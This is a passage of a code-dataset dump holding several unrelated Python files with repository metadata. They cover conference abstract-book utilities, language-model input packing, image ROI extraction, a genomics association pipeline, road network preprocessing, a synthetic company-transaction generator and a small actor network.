media_links[\"Email\"].isin([email]) & media_links[\n \"Title\"\n 
].isin([title])\n            # this is not entirely reliable\n            if sum(mask) == 1:\n                pdf, video = media_links.loc[\n                    mask, [\"PDF Link\", \"Thumbnail Link\"]\n                ].values.tolist()[0]\n                df_abstract.loc[idx, \"pdf\"] = pdf\n                # df_abstract.loc[idx, \"video\"] = video\n    return df_abstract.reset_index()\n\n\ndef compile_authros_index(df_accepted):\n    \"\"\"Get author name and associated posters.\"\"\"\n    authors = authro_index_ref(df_accepted)\n    df_authors = pd.DataFrame(\n        columns=[\"lastname\", \"firstname\", \"submissionNumber\"]\n    )\n    for author in authors.values():\n        if author[\"middlename\"] is None:\n            df = pd.DataFrame(\n                [\n                    _capitalise_name(author[\"lastname\"]),\n                    _capitalise_name(author[\"firstname\"]),\n                    \",\".join(sorted(author[\"submissionNumber\"])),\n                ],\n                index=[\"lastname\", \"firstname\", \"submissionNumber\"],\n            )\n        else:\n            df = pd.DataFrame(\n                [\n                    _capitalise_name(author[\"lastname\"]),\n                    f\"{_capitalise_name(author['firstname'])} {_capitalise_name(author['middlename']).replace('.', '')}\",\n                    \",\".join(sorted(author[\"submissionNumber\"])),\n                ],\n                index=[\"lastname\", \"firstname\", \"submissionNumber\"],\n            )\n        df_authors = pd.concat([df_authors, df.T], axis=0)\n    df_authors = df_authors.sort_values(\"firstname\").sort_values(\"lastname\")\n    return df_authors\n\n\ndef category_to_df(df_accepted, latebreaking_only=True):\n    \"\"\"Convert the categories from dictionary to dataframe that's compatible\n    with pdf creation.\"\"\"\n    categories_finder, first_batch = _load_categories()\n    categories_finder[\n        \"Polarized light imaging (PLI)\"\n    ] = \"Novel Imaging Acquisition Methods\"\n    categories_finder[\n        \"Optical coherence tomography (OCT)\"\n    ] = \"Novel Imaging Acquisition Methods\"\n    if latebreaking_only:\n        poster_categories = _update_categores(\n            df_accepted, categories_finder, {}\n        )\n    else:\n        poster_categories = _update_categores(\n            df_accepted, categories_finder, first_batch\n        )\n    df_cat = pd.DataFrame()\n    for key in poster_categories:\n        sub_cats = {key: None}\n        for sk in poster_categories[key]:\n            sub_cats[sk] = \",\".join(sorted(poster_categories[key][sk]))\n        df = pd.DataFrame(sub_cats, index=range(1)).T\n        index = df.index.tolist()\n        if \"Other\" in index and index[-1] != \"Other\":\n            index.remove(\"Other\")\n            index.append(\"Other\")\n        df_cat = pd.concat([df_cat, df.loc[index, :]], axis=0)\n    return df_cat.reset_index()\n\n\ndef authro_index_ref(df_accepted):\n    \"\"\"Create author index reference.\"\"\"\n    authors = {}\n    for i, row in df_accepted.iterrows():\n        for speaker in row[\"speakers\"][\"speaker\"]:\n            speaker_id = int(speaker[\"@id\"])\n            if speaker_id not in authors:\n                authors[speaker_id] = {\n                    \"firstname\": speaker[\"firstname\"],\n                    \"middlename\": speaker[\"middlename\"],\n                    \"lastname\": speaker[\"lastname\"],\n                    \"submissionNumber\": set(),\n                }  # use set to prevent duplication\n            if type(row[\"submissionNumber\"]) is list:\n                for s in row[\"submissionNumber\"]:\n                    authors[speaker_id][\"submissionNumber\"].add(s)\n            else:\n                authors[speaker_id][\"submissionNumber\"].add(\n                    row[\"submissionNumber\"]\n                )\n    return authors\n\n\ndef _capitalise_name(x):\n    \"\"\"Capitalise names.\"\"\"\n    x = \" \".join(i.capitalize() for i in x.split(\" \"))\n    if len(x.split(\"-\")) > 1:\n        x = \"-\".join(i.capitalize() for i in x.split(\"-\"))\n    return x\n\n\ndef _get_categories(df_accepted):\n    \"\"\"Get primary and secondary category numbers for posters.\"\"\"\n    df_accepted[\"primary_category\"] = None\n    df_accepted[\"secondary_category\"] = None\n    pc, sc = None, None\n    for idx, row in 
df_accepted.iterrows():\n for cat in row[\"categories\"][\"category\"]:\n if cat[\"priorityOrder\"] == \"1\":\n pc = _parse_category_name(cat[\"name\"])\n elif cat[\"priorityOrder\"] == \"2\":\n sc = _parse_category_name(cat[\"name\"])\n df_accepted.loc[idx, \"primary_category\"] = pc\n df_accepted.loc[idx, \"secondary_category\"] = sc\n return df_accepted.loc[\n :,\n [\n \"submissionNumber\",\n \"title\",\n \"primary_category\",\n \"secondary_category\",\n ],\n ]\n\n\ndef _parse_category_name(name):\n \"\"\"Some weird names\"\"\"\n if name in exeption_cat:\n return exeption_cat[name]\n return (\n name.replace(\"’\", \"'\")\n .replace(\" La\", \"La\")\n .replace(\" Ea\", \"Ea\")\n .replace(\"/ V\", \"/V\")\n )\n\n\ndef _load_categories():\n \"\"\"Load the existing categories\"\"\"\n df_cat_exist = pd.read_csv(\n \"data/firstsubmission_categories_index.csv\", sep=\"€\", header=None\n )\n df_cat_exist.columns = [\"category\", \"poster_no\"]\n poster_categories = {}\n for _, row in df_cat_exist.iterrows():\n if not isinstance(row[\"poster_no\"], str):\n poster_categories[row[\"category\"]] = {}\n parent = row[\"category\"]\n else:\n poster_categories[parent][row[\"category\"]] = set(\n row[\"poster_no\"].split(\",\")\n )\n\n categories = {}\n for parent in poster_categories:\n sub_cats = poster_categories[parent].keys()\n for sub in sub_cats:\n if sub == \"Other\":\n categories[f\"{parent} {sub}\"] = parent\n else:\n categories[f\"{sub}\"] = parent\n return categories, poster_categories\n\n\ndef _update_categores(df_accepted, categories_finder, poster_categories):\n \"\"\"Add category info from a new set of entries\"\"\"\n update = poster_categories.copy()\n df_latebreak_categories = _get_categories(df_accepted)\n\n for _, row in df_latebreak_categories.iterrows():\n for cat in [\"primary_category\", \"secondary_category\"]:\n\n parent_cat = categories_finder.get(row[cat], False)\n if (\n \"Other\" in row[cat]\n and row[cat] == \"Non-Invasive Methods Other\"\n or \"Other\" not in row[cat]\n ):\n child_cat = row[cat]\n else:\n child_cat = \"Other\"\n\n if isinstance(parent_cat, str):\n if parent_cat not in update:\n update[parent_cat] = {child_cat: set()}\n if child_cat not in update[parent_cat]:\n update[parent_cat][child_cat] = set()\n update[parent_cat][child_cat].add(row[\"submissionNumber\"])\n else:\n print(row[\"title\"])\n print(\"cannot find:\", row[cat])\n print(\n \"category info:\",\n row[[\"primary_category\", \"secondary_category\"]].tolist(),\n )\n return update\n","repo_name":"margulies/ohbm2021","sub_path":"ohbm2021_abstract_book/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8651,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"33022429888","text":"from cpm_live.training_tasks.bee.pretrain import convert_data_to_id\nfrom cpm_live.utils import pad\nimport torch.nn.functional as F\nfrom cpm_live.tokenizers import CPMBeeTokenizer\nimport torch\nfrom typing import Any, Dict, List, Tuple\nimport numpy as np\n\n\ndef _convert_to_tensors(data: Any, in_context_samples: List[Any] = []):\n tokenizer = CPMBeeTokenizer()\n answer_placeholders = []\n def _put_placeholder(data: Any, path: List[str] = []):\n if isinstance(data, dict):\n ret = {}\n for k, v in data.items():\n ret[k] = _put_placeholder(v, path + [k])\n return ret\n else:\n answer_placeholders.append(path)\n return \"\".format(len(answer_placeholders))\n \n data[\"\"] = _put_placeholder(data[\"\"])\n (\n input_ids,\n input_id_subs,\n context,\n 
segment_ids,\n        segment_rel,\n        n_segments,\n        table_states,\n    ) = convert_data_to_id(tokenizer, data, shuffle_answer=False, max_depth=8)\n    \n    sub_ans_map: Dict[int, int] = {}\n    for fake_id, token_sub in table_states[\"token_id_table\"][\"\"].items():\n        token = table_states[\"ext_table\"][fake_id]\n        if token.startswith(\"\"):\n            ans_id = int(token[5:-1])\n            sub_ans_map[token_sub] = ans_id\n\n    tmp_input_ids = []\n    tmp_input_sub = []\n    tmp_input_seg = []\n\n    predict_segments: List[Tuple[int, int]] = []\n    for i in range(input_ids.shape[0]):\n        if context[i] == 0:\n            if input_ids[i] == tokenizer.encoder[\"\"]:\n                # is ans\n                # (segment_id, ans_id)\n                predict_segments.append((segment_ids[i], sub_ans_map[input_id_subs[i]]))\n            else:\n                tmp_input_ids.append(input_ids[i])\n                tmp_input_sub.append(input_id_subs[i])\n                tmp_input_seg.append(segment_ids[i])\n\n    if len(predict_segments) == 0:\n        raise ValueError(\"No answer to predict\")\n\n    input_ids = np.array(tmp_input_ids, dtype=np.int32)\n    input_id_subs = np.array(tmp_input_sub, dtype=np.int32)\n    context = np.full_like(tmp_input_ids, 1, dtype=np.int8)\n    segment_ids = np.array(tmp_input_seg, dtype=np.int32)\n    sample_ids = np.zeros(input_ids.shape, dtype=np.int32)\n    segment_rel_offset = np.zeros(input_ids.shape, dtype=np.int32)\n    num_segments = np.full(input_ids.shape, n_segments, dtype=np.int32)\n\n    for i, sample in enumerate(in_context_samples):\n        (\n            sample_input_ids,\n            sample_id_subs,\n            _,\n            sample_segments,\n            sample_rel,\n            n_segments,\n            table_states,\n        ) = convert_data_to_id(tokenizer, sample, table_states, max_depth=8)\n        input_ids = np.concatenate([input_ids, sample_input_ids], axis=0)\n        input_id_subs = np.concatenate([input_id_subs, sample_id_subs], axis=0)\n        context = np.concatenate(\n            [context, np.ones(sample_input_ids.shape, dtype=np.int8)], axis=0\n        )\n        segment_ids = np.concatenate([segment_ids, sample_segments], axis=0)\n        segment_rel_offset = np.concatenate(\n            [\n                segment_rel_offset,\n                np.full(sample_input_ids.shape, segment_rel.shape[0], dtype=np.int32),\n            ],\n            axis=0,\n        )\n        segment_rel = np.concatenate([segment_rel, sample_rel], axis=0)\n        sample_ids = np.concatenate(\n            [sample_ids, np.full(sample_input_ids.shape, i + 1, dtype=np.int32)], axis=0\n        )\n        num_segments = np.concatenate(\n            [num_segments, np.full(sample_input_ids.shape, n_segments, dtype=np.int32)], axis=0\n        )\n    input_pos = np.arange(input_ids.shape[0], dtype=np.int32)\n\n    return (\n        input_ids,\n        input_id_subs,\n        input_pos,\n        context,\n        segment_ids,\n        segment_rel_offset,\n        segment_rel,\n        sample_ids,\n        num_segments,\n        predict_segments,\n        answer_placeholders,\n        table_states[\"ext_table\"],\n        table_states[\"token_id_table\"],\n    )\n\ndef process_sentence_list(data_list: List[Any]):\n    tokenizer = CPMBeeTokenizer()  # needed below for encoder lookups and vocab_size\n    pack_tensor = []\n    other_info = []\n    segment_rel_pack = []\n\n    batch_ext_table_map: Dict[Tuple[int, int], int] = {}\n    batch_ext_table_ids: List[int] = []\n    batch_ext_table_sub: List[int] = []\n    \n    for data in data_list:\n        # print(data)\n        (\n            input_ids,\n            input_id_subs,\n            input_pos,\n            context,\n            segment_ids,\n            segment_rel_offset,\n            segment_rel,\n            sample_ids,\n            num_segments,\n            predict_segments,\n            answer_placeholders,\n            ext_table,\n            token_id_table,\n        ) = _convert_to_tensors(data, [])\n        rev_ext_table: Dict[int, str] = {}\n        for token, mp in token_id_table.items():\n            if token == \"\":\n                continue\n            token_id = tokenizer.encoder[token]\n            for fake_id, token_sub in mp.items():\n                if token_sub > 0:\n                    if (token_id, token_sub) not in batch_ext_table_map:\n                        batch_ext_table_map[(token_id, token_sub)] = (\n                            
len(batch_ext_table_ids) + tokenizer.vocab_size\n )\n batch_ext_table_ids.append(token_id)\n batch_ext_table_sub.append(token_sub)\n rev_ext_table[batch_ext_table_map[(token_id, token_sub)]] = ext_table[\n fake_id\n ]\n else:\n rev_ext_table[token_id] = ext_table[fake_id]\n pack_tensor.append(\n {\n \"input\": torch.from_numpy(input_ids).unsqueeze(0),\n \"input_sub\": torch.from_numpy(input_id_subs).unsqueeze(0),\n \"context\": torch.from_numpy(context).unsqueeze(0),\n \"sample_ids\": torch.from_numpy(sample_ids).unsqueeze(0),\n \"num_segments\": torch.from_numpy(num_segments).unsqueeze(0),\n \"segment\": torch.from_numpy(segment_ids).unsqueeze(0),\n \"segment_rel_offset\": torch.from_numpy(segment_rel_offset).unsqueeze(0),\n \"length\" : torch.tensor([len(data) for data in torch.from_numpy(input_ids).unsqueeze(0)])\n }\n )\n segment_rel_pack.append(torch.from_numpy(segment_rel))\n other_info.append(\n {\n \"predict_segments\": predict_segments,\n \"answer_placeholders\": answer_placeholders,\n \"ext_table\": rev_ext_table,\n }\n )\n\n keys = set(pack_tensor[0].keys())\n padded = {}\n for key in keys:\n padded[key] = pad(pack_tensor, key)\n\n max_num_rels = 0\n for rel in segment_rel_pack:\n max_num_rels = max(max_num_rels, rel.size(0))\n padded_rels = torch.zeros(len(segment_rel_pack), max_num_rels, dtype=torch.int32)\n for i, rel in enumerate(segment_rel_pack):\n padded_rels[i, : rel.size(0)] = rel\n padded[\"segment_rel\"] = padded_rels\n padded[\"ext_table_ids\"] = torch.tensor(\n batch_ext_table_ids, dtype=torch.int32\n )\n padded[\"ext_table_sub\"] = torch.tensor(\n batch_ext_table_sub, dtype=torch.int32\n )\n padded['span'] = torch.zeros(padded['input'].shape).cuda()\n # move to model device\n for k, v in padded.items():\n if isinstance(v, torch.Tensor):\n padded[k] = v.cuda()\n\n return padded, other_info","repo_name":"guankaisi/SentCPM","sub_path":"SentCPM/input_type.py","file_name":"input_type.py","file_ext":"py","file_size_in_byte":7507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"20523694670","text":"import time\nimport webbrowser\n\ndef break_time():\n\n\tprint(\"The program started on \"+time.ctime())\n\twait=0\n\twhile(wait<3):\n\t\twebbrowser.open('https://www.youtube.com/watch?v=_WOwRVTKJUw')\n\t\ttime.sleep(2)\n\t\twait=wait+1\n\nbreak_time()\n","repo_name":"sudosree/Python","sub_path":"project/take_break.py","file_name":"take_break.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72596100882","text":"import cv2\nimport math\nimport numpy as np\n\nfrom taggridscanner.aux.utils import Functor, rel_corners_to_abs_corners\n\n\ndef create_frame_corners(size):\n width, height = size\n return np.array(\n [\n [0, 0],\n [width, 0],\n [width, height],\n [0, height],\n ],\n dtype=np.float32,\n )\n\n\ndef create_unit_frame_corners():\n return create_frame_corners((1, 1))\n\n\ndef distance(p0, p1):\n return np.linalg.norm(p1 - p0)\n\n\ndef compute_roi_shape(roi_corners, roi_aspect_ratio):\n p = roi_corners\n\n dist_v_left = distance(p[3], p[0])\n dist_v_right = distance(p[1], p[2])\n dist_v = max(dist_v_left, dist_v_right)\n\n dist_h_top = distance(p[0], p[1])\n dist_h_bottom = distance(p[2], p[3])\n dist_h = max(dist_h_top, dist_h_bottom)\n\n if dist_v * roi_aspect_ratio * dist_v > dist_h * dist_h / roi_aspect_ratio:\n h = math.ceil(dist_v)\n w = math.ceil(dist_v * roi_aspect_ratio)\n else:\n h = math.ceil(dist_h / 
roi_aspect_ratio)\n w = math.ceil(dist_h)\n\n return h, w\n\n\n# transforms the frame into the 1x1 square with top-left corner (0,0)\ndef to_frame_1x1_mat(detected_frame_corners):\n unit_frame_corners = create_unit_frame_corners()\n h = cv2.findHomography(detected_frame_corners, unit_frame_corners)\n return h[0]\n\n\ndef compute_roi_matrix(image_shape, rel_corners, roi_shape):\n img_height, img_width = image_shape[0:2]\n downscale_mat = np.array(\n [\n [1.0 / img_width, 0, 0],\n [0, 1.0 / img_height, 0],\n [0, 0, 1],\n ]\n )\n\n roi_height, roi_width = roi_shape\n upscale_mat = np.array(\n [\n [roi_width, 0, 0],\n [0, roi_height, 0],\n [0, 0, 1],\n ]\n )\n\n unit_roi_mat = to_frame_1x1_mat(rel_corners)\n\n mat = np.matmul(upscale_mat, np.matmul(unit_roi_mat, downscale_mat))\n\n return mat\n\n\nclass ExtractROI(Functor):\n def __init__(self, target_aspect_ratio, rel_corners=create_unit_frame_corners()):\n super().__init__()\n self.target_aspect_ratio = target_aspect_ratio\n self.rel_corners = rel_corners\n\n def __call__(self, image):\n # compute target ROI size\n abs_corners = rel_corners_to_abs_corners(self.rel_corners, image.shape)\n target_size = compute_roi_shape(abs_corners, self.target_aspect_ratio)\n\n # compute homography matrix\n mtx = compute_roi_matrix(image.shape, self.rel_corners, target_size)\n\n return cv2.warpPerspective(image, mtx, target_size, flags=cv2.INTER_AREA)\n","repo_name":"IMAGINARY/tag-grid-scanner","sub_path":"taggridscanner/pipeline/extract_roi.py","file_name":"extract_roi.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"24298477431","text":"import os\nimport scipy\nimport random\nimport subprocess\nimport numpy as np\nimport pandas as pd\nfrom utils import *\nfrom multiprocessing import Pool\ndef worker(ind, f1, f2, out_f, step=1000): # f save in 'scipy.sparese.npz' format\n\t\tm1 = scipy.sparse.load_npz(f1) \n\t\tm2 = scipy.sparse.load_npz(f2)\n\t\tm2 = csr_matrix(m2[ind*step:(ind+1)*step, :])\n\t\tif m1.shape[1] != m2.shape[0]:\n\t\t\traise('dimention incompatible!')\n\t\tm = m1.dot(m2)\t\n\t\tscipy.sparse.save_npz(out_f, m)\ndef dd_dot(d1, d2, out, parallel=True):\n\tprint('Starting dd_dot ...')\n\tprint('d1: ', d1)\n\tprint('d2: ', d2)\n\td1_lst = sorted(os.listdir(d1)) # sg_d\n\td2_lst = sorted(os.listdir(d2)) # si_d\n\tif (d1_lst == d2_lst):\n\t\tprint('d1 and d2 have the same order.')\n\telse:\n\t\tprint('len(d1):', len(d1))\n\t\tprint('len(d2):', len(d2))\n\t\traise(\"ERROR: d1 doesn't match with d2!\")\n\tprint('ig d:', out)\n\tout_lst = os.listdir(out)\n\tout_lst = [i.split('.')[0] for i in out_lst]\n\tif len(out_lst) != len(d1_lst):\n\t\tpool = Pool(10)\n\t\tfor ind, (d1_f, d2_f) in enumerate(zip(d1_lst, d2_lst)):\n\t\t\tif d1_f not in out_lst:\n\t\t\t\tcommon_f = d1_f\n\t\t\t\tout_f = '{}/{}'.format(out, common_f)\n\t\t\t\td1_f = '{}/{}'.format(d1, common_f)\n\t\t\t\td2_f = '{}/{}'.format(d2, common_f)\n\t#\t\t\tprint('into loop')\n\t\t\t\tif parallel:\n\t\t\t\t\tpool.apply_async(worker,(ind, d1_f, d2_f, out_f,))\n\t\t\t\telse:\n\t\t\t\t\tworker(ind, d1_f, d2_f, out_f)\n\t\tpool.close()\n\t\tpool.join()\n\t\tgo_on = True\n\telse:\n\t\tgo_on = False\n\t\tprint('dd mult done, results save to {}.'.format(out))\n\treturn go_on \ndef mult_casual(pre, sg_f, gg_f=None, reg=None, step=1):\n\td, _ = os.path.split(pre)\n\tgdic_f = '{}_gdic.txt'.format(pre)\n\tpheno_f = '{}.pheno'.format(pre)\n\t_, sg_pre = os.path.split(sg_f) \n\tsg_pre = 
sg_pre[:-7]\n\tsg_d = '{}/{}_sg'.format(d, sg_pre)\n\tis_d = '{}/{}_is'.format(d, sg_pre)\n\tig_d = '{}/{}_ig'.format(d, sg_pre)\n\tif gg_f:\n\t\t_, gg_pre = os.path.split(gg_f)\n\t\t#gg_pre = gg_pre[:-8]\n\t\tprint('gg_pre', gg_pre)\n\t\tgeno_f = '{}/{}.{}.{}.isg.geno'.format(d, sg_pre, gg_pre, step)\n\t\to = '{}.{}.{}.isg'.format(sg_pre, gg_pre, step)\n\telse:\t\n\t\tgeno_f = '{}/{}.is.geno'.format(d, sg_pre)\n\t\to = '{}.is'.format(sg_pre)\n\tprint('o', o)\n\tprint('sg_d', sg_d)\n\tprint('is_d', is_d)\n\tprint('ig_d', ig_d)\n\tprint('geno_f', geno_f)\n\t# main\n\tif not reg:\n\t\tgo_on = dd_dot(is_d, sg_d, ig_d, parallel=False)\n\t\tif go_on:\n\t\t\tdd_dot(is_d, sg_d, ig_d)\n\t\t\tprint('complting igmat ...')\n\t\tig = os.listdir(ig_d)\n\t\tigmat = scipy.sparse.load_npz(os.path.join(ig_d, ig[0]))\n\t\tfor i in ig[1:]:\n\t\t\tigmat += scipy.sparse.load_npz(os.path.join(ig_d, i))\n\t\tif gg_f:\n\t\t\tggmat = scipy.sparse.load_npz(gg_f)\n\t\t\tggmat = ggmat.power(step)\n\t\t\tigmat = igmat.dot(ggmat)\n\t\tigmat = igmat.toarray()\n\t\tigmat = rescale(igmat)\n\t\tgimat = igmat.transpose()\n\t\tgimat = pd.DataFrame(gimat)\n\t\tprint('the final shape is :', gimat.shape)\n\t\tlmat = left(gdic_f)\n\t\tomat = pd.concat([lmat, gimat], ignore_index=True, axis=1)\n\t\tprint('outputing geno to {}.'.format(geno_f))\n\t\tomat.to_csv(geno_f, header=None, index=False)\n\torder = 'gemma -g {} -p {} -lm 1 -outdir {} -o {}'.format(geno_f, pheno_f, d, o); print(order); os.system(order)\ndef mult_input(pre, sg_f):\n\td, _ = os.path.split(pre)\n\t_, sg_pre = os.path.split(sg_f)\n\tsg_pre = sg_pre[:-7]\n\tsi_f = '{}.geno'.format(pre)\n\tgdic_f = '{}_gdic.txt'.format(pre)\n\tsdic_f = '{}_sdic.txt'.format(pre)\n\tis_d = '{}/{}_is'.format(d, sg_pre) \n\tsi_d = '{}/{}_si'.format(d, sg_pre) \n\tig_d = '{}/{}_ig'.format(d, sg_pre)\n\tsg_d = '{}/{}_sg'.format(d, sg_pre)\n\tif not os.path.isdir(is_d):\n\t\tos.makedirs(is_d)\n\tif not os.path.isdir(si_d):\n\t\tos.makedirs(si_d)\n\tif not os.path.isdir(ig_d):\n\t\tos.makedirs(ig_d)\n\tif not os.path.isdir(sg_d):\n\t\tos.makedirs(sg_d)\n\tbimbam_2_is(si_f, is_d=is_d, si_d=si_d)\t\n\tsg(sg_f, si_d=si_d, sg_d=sg_d, gdic_f=gdic_f, sdic_f=sdic_f)\ndef main_1():\n#\tmult_input('data/mult/arabi', 'data/arabi.20kb.sg.txt')\n\tfor r in range(1, 10):\n#\t\tmult_casual('data/mult/arabi', 'data/arabi.20kb.sg.txt', gg_f='data/ppi_mult/atpin.2.no-weight.ppi.txt.npz', step=r)\n\t\tmult_casual('data/mult/arabi', 'data/arabi.20kb.sg.txt', gg_f='data/ppi_mult/atpin.ppi.2evidence.weight.txt.npz', step=r)\n#\t\tmult_casual('data/mult/arabi', 'data/arabi.20kb.sg.txt', step=r)\ndef main_2():\n\tprint('Begin.')\n\tsg_d = 'data/mateqtl'\n\tppi_d = 'data/ppi_mult'\n\tfor i in os.listdir(sg_d):\n\t\tif i.endswith('sg.txt'):\n\t\t#\tif i != 'arabi.0.01.1e+06Dist.p.sg.txt':\n\t\t\tfor k in range(9, 5, -1):\n\t\t\t\tif i.startswith('arabi.5e-0{}'.format(k)):\n\t\t\t\t\tprint('sg is :', i)\n\t\t\t\t\ti = '{}/{}'.format(sg_d, i)\n\t\t\t\t\tmult_input('data/mult/arabi', i)\n\t\t\t\t\tmult_casual('data/mult/arabi', i)\n\t\t\t\t\tfor j in os.listdir(ppi_d):\n\t\t\t\t\t\tif j.endswith('npz'):\n\t\t\t\t\t\t\tj = '{}/{}'.format(ppi_d, j)\n\t\t\t\t\t\t\tmult_casual('data/mult/arabi', i, gg_f=j)\n# test svm kernel\ndef main_3():\n\td = 'data/svm'\n\td2 = 'data/mateqtl'\n\tfor i in os.listdir(d):\n\t\tif i.startswith('test.23445.153') and i.endswith('npz'):\n\t\t\tif i != 'test.23445.153.linear.kernel.npz':\n\t\t\t\tmult_casual('data/mult/arabi', 'data/arabi.20kb.sg.txt', gg_f='{}/{}'.format(d, i))\n\n\tfor i 
in os.listdir(d):\n\t\tif i.startswith('test.23445.153') and i.endswith('npz'):\n\t\t\tfor j in os.listdir(d2):\n\t\t\t\tif j.startswith('arabi.5e-06.1e+06') and j.endswith('sg.txt'):\n\t\t\t\t\tmult_casual('data/mult/arabi', '{}/{}'.format(d2, j), gg_f='{}/{}'.format(d, i))\n\t\t\t\t\ndef test():\n\tmult_input('./test/test')\n\tr = mult_casual('./test/test', 'test', reg=True)\n\tr = mult_casual('./test/test', 'test', gg_f='test/test.ppi.txt.npz')\n\tr = mult_input('data/mult/arabi', out_pre='data/mult/20kb', sg_pre='data/mult/arabi')\n\tr = mult_casual('data/mult/arabi', out_pre='data/mult/20kb', sg_pre='data/mult/arabi', gg_f='data/ppi_mult/atpin.2.no-weight.ppi.txt.npz')\n\tr = mult_casual('data/mult/arabi', out_pre='data/mult/20kb', sg_pre='data/mult/arabi', gg_f='data/ppi_mult/atpin.2.weight.ppi.txt.npz')\n\tr = mult_casual('data/mult/arabi', sg_f, reg=True)\n\t\nif __name__ == '__main__':\n\tmain_3()\n#\tmult_casual('data/mult/arabi', 'data/arabi.20kb.sg.txt', gg_f='data/svm/test.23445.153.linear.kernel.npz')\n","repo_name":"jianglinghan/MultCausal","sub_path":"MultCausal/multcausal.py","file_name":"multcausal.py","file_ext":"py","file_size_in_byte":5943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31598263270","text":"import pandas as pd\nimport geopandas as gpd\n\ndef read_road_hierarchy(path=None):\n \n if path is None:\n path = 'C:/zhouweifile/Transportation Data/OSM/tag_processing.xlsx' \n \n hierarchy_mapper = pd.read_excel(path, sheet_name='highway', index_col=None, header=0) \\\n .query('Key == \\'highway\\'') \\\n .query('Hierarchy != \\'Deleted\\'')\\\n [['Value', 'Hierarchy']] \\\n .set_index('Value') \\\n .squeeze() \\\n .to_dict() \n \n return hierarchy_mapper\n# --------------------------------------------------------------------------\ndef preprocessed_road_network(path, drop_link=True, target_crs=None):\n\n data = gpd.read_file(path, encoding='gbk')\n \n if not (target_crs is None):\n data = data.to_crs(target_crs)\n \n if drop_link:\n for link_label in ['motorway_link', 'trunk_link', 'primary_link', 'secondary_link', 'tertiary_link']:\n data = data[data['highway'] != link_label]\n \n \n hierarchy_mapper = read_road_hierarchy(path=None)\n data['hierarchy'] = data['highway'].map(hierarchy_mapper)\n data = data[data['hierarchy'] != 'Deleted']\n data['geometry'] = data['geometry'].make_valid()\n \n return data\n# ==========================================================\n\n\n\nread_path = 'zip://road_network.zip!road_network.shp'\nsave_path = 'road_network_processed.shp'\n\ndata = preprocessed_road_network(read_path, target_crs=None)\ndata.to_file(save_path, encoding='utf-8')","repo_name":"veager/VeTool-Processing-POI-Landuse","sub_path":"OSM highway/road_network_preprocessing.py","file_name":"road_network_preprocessing.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9174129975","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 24 13:16:12 2020\n\n@author: gzy\n\"\"\"\n# encoding: utf-8\n\nimport random\nimport string\nimport time\nimport csv\n\ncompany = []\nrelation = []\nID = set() ###\nNAME = []\n\n# 模拟产生企业ID及NAME\n\nfor i in range(5000):\n # 模拟企业18位纳税人识别号\n\n id = random.randint(100000000,1000000000)\n id = str(id)\n #id = \"'\" + id\n\n # 模拟企业名称,随机生成的四个汉字\n\n first_name_val = random.randint(0x4e00, 0x5e95)\n second_name_val = random.randint(0x4e00, 0x5e95)\n third_name_val = 
random.randint(0x4e00, 0x5e95)\n fourth_name_val = random.randint(0x4e00, 0x5e95)\n\n first_name = chr(first_name_val)\n second_name = chr(second_name_val)\n third_name = chr(third_name_val)\n fourth_name = chr(fourth_name_val)\n\n name = first_name + second_name + third_name + fourth_name\n if id not in ID: ###\n ID.add(id) ####\n NAME.append(name)\n company.append([id,name])\n\nID = list(ID)\n# 模拟产生企业间票流\n\nfor i in ID: \n startID = random.choice(ID)\n \n J = random.randint(0,10)\n \n for j in range(J):\n endID = random.choice(ID)\n if startID != endID:\n K = random.randint(0,10)\n for k in range(K):\n\n amount = random.randint(0,10000)\n Type = random.choice(string.ascii_uppercase)\n \n a1=(2019,1,1,0,0,0,0,0,0) # 设置开始日期时间元组\n a2=(2019,12,31,23,59,59,0,0,0) # 设置结束日期时间元组\n start=time.mktime(a1) # 生成开始时间戳\n end=time.mktime(a2) # 生成结束时间戳\n t=random.randint(start,end)\n creat_time_touple=time.localtime(t)\n creat_time=time.strftime(\"%Y-%m-%d\",creat_time_touple)\n\n \n relation.append((startID,endID,amount,Type,creat_time))\n \n else:\n continue\n\n\n# 企业数据写入company.csv\n\n\nwith open(r'/data1/tq/neo4j-community-3.5.5/import/company.csv','w',newline='')as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow(['id:ID','name'])\n for string in company:\n writer.writerow(string)\n\n\n# 关系数据写入relation.csv\n\nwith open(r'/data1/tq/neo4j-community-3.5.5/import/relation.csv','w',newline='')as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow([':START_ID',':END_ID','amount:int',':Type','ctime:datetime'])\n for string in relation:\n writer.writerow(string)\n\n\n# 输出企业数据及关系数据\n# print(company)\n# print(relation)\n\n\n\n\n\n","repo_name":"GZYBigGG/NLPStudy","sub_path":"文本挖掘/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23021919190","text":"import torch.nn as nn\r\nfrom torch.distributions import Normal, Categorical\r\n\r\n\r\nclass Actor(nn.Module):\r\n def __init__(self, state_dim, d_dim, c_dim, hidden_dim):\r\n super(Actor, self).__init__()\r\n\r\n self.liner = nn.Sequential(\r\n nn.Linear(state_dim, hidden_dim),\r\n nn.Tanh(),\r\n #nn.ReLU(),\r\n nn.Linear(hidden_dim, hidden_dim),\r\n nn.Tanh()\r\n #nn.ReLU()\r\n )\r\n\r\n self.d_prob = nn.Sequential(\r\n nn.Linear(hidden_dim, d_dim),\r\n nn.Softmax(dim=-1)\r\n )\r\n\r\n self.mu_head = nn.Sequential(\r\n nn.Linear(hidden_dim, c_dim),\r\n nn.Sigmoid()\r\n )\r\n\r\n self.sigma_head = nn.Sequential(\r\n nn.Linear(hidden_dim, c_dim),\r\n nn.Softplus()\r\n )\r\n\r\n def forward(self, state):\r\n x = 